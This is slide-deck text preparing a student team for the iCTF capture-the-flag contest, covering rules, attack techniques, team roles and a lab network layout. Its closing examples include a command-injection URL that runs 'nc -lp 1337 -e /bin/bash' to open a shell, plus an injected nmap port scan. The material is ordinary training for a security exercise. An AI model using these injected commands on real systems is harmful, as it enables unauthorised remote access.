Embed Size (px)
Citation preview
CAPTURE THE FLAG
Introductions
beer brew man
dutchrowboat
Teams
Firewall IDS/IPS Services – Attack and Defense
PHP, Perl, Ruby, Python, Java Analysis
Wireshark, etc. C/ASM Operating System
Apache, OS Configuration, etc.
iCTF
Came from Defcon iCTF ran by UCSB No test required – just edu “Largest existing live security exercise”
Test Skills of understanding security
What is it?
A variety of Internet enabled services Services comprised of:
PHP Perl Shell Scripts C++ MySQL Apache/lighttpd SSH XML RPC FTP
What to do
All services should be protected Patch IPS/IDS
All services should be attacked
Blender
SNAT with weights?
Is it real?
Rules
No DOS All traffic is penalized Must stay on internal network
Don't prevent legitimate traffic
Don't break rules If attack service, don't launch DOS
from compromised machine
2005 Defcon – hack the scorebot
Attack Techniques
• Buffer overflows • Format string attacks • Shell attacks • Race conditions • Misconfigurations • Authentication attacks • Web-based attacks
Directory traversal Cookie-based services Cross-site scripting Server-side applications
• Lack of parameter validation (e.g., SQL injection)
Skills Scanning • Firewalling • Intrusion Detection • Vulnerability analysis • For each type of vulnerability
How to identify a vulnerability How to exploit a vulnerability How to patch a vulnerability
(without disrupting the get/set flag methods) How to detect a vulnerability
• For each service How to monitor the requests to a service How to monitor the execution of a request Protocol security analysis Application security analysis
Vigna's Suggestions
Have a structured team with clear responsibilities The Perl/Python/PHP group The SQL/database group The flaw-finder group The firewall group The IDS group The C-based exploit group
• Have a leader responsible for coordination and integration • Have a way to intercept socket connections and apply
regexes/substitutions • Have vulnerability analysis tools handy • Have a “human IDS” • Remember: the game lasts only a few hours
Not the first time…
2009
Backups…
Test Network
Real Network
Image 10.10.1.2
10.10.1.3Vuln
10.10.1.4Team
Hub
Team Box10.10.1.1
Mon Box10.10.1.x
AttackBoxes
Console for Fixes
Image Test Box
VulnPatch Test
VulnAttack Box
UCCSBoxes
UCCSBoxes
Some Examples
echo GET / | nc 10.110.134.123 80 > ./myoutput.txt
http://10.100.134.77/users/[email protected]?command=nc -lp 1337 -e /bin/bash
http://10.100.134.77/users/[email protected]?command=nmap -p 1-65535 10.120.134.222 > port.txt
